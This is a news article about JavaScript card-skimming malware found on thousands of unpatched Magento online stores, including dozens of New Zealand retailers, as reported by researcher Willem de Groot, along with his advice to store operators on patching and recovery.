Scores of New Zealand online retail sites have been hacked and are infected by credit card skimming software that can steal customers' payment information, a security researcher has found.

The stores run vulnerable, unpatched versions of the Magento shopping cart software.

Unknown criminals are using security holes in the vulnerable systems and inject malicious code written in Javascript, according to Willem de Groot, who runs a Magento hosting company in the Netherlands.

As unsuspecting customers go to pay for their goods and services, the malware silently copies their credit card details and sends them to a server believed to be in Russia, hosted on a provider known to harbour cyber criminals.


The Javascript malware first appeared in November 2015, but de Groot said the number of hacked sites has jumped by more than two-thirds since then and now stands at over 5,900 worldwide.

A search for .nz on a list of sites published by de Groot and shared with the Herald revealed 47 New Zealand sites that serve up the credit card skimming malware, and 220 in Australia.

The Kiwi sites that are infected are mainly small online retailers, as well as sports associations and art galleries.

The Herald contacted several site operators to ask if they were aware of the malware on their sites, but only received two replies - one operator patched the flaws through their development team, and an online pharmacy said they would investigate their site being hacked.

While de Groot doesn't know how many credit cards have been compromised, he estimated that an earlier attack on the United States Republican political party website that uses Magento to accept donations netted somewhere in the region of US$600,000 since March.

De Groot warned that if attacker are able to insert malware on retailers' Magento shopping carts, it is likely that the site database has been compromised as well.

He advised store operators to contact competent programmers to help recover from the hack, and has set up the MageReport website that allows store owners to check if their sites are infected, or missing security patches.

The credit card skimming hack comes after last year's "Shoplift" security scare that left vulnerable Magento sites wideopen to full takeover by attackers.


According to de Groot, the reason so many Magento sites remain unpatched is because operators either lack the technical knowledge to do so, or can't afford to pay someone to apply the fixes.

Watch: Willem de Groot explains the hack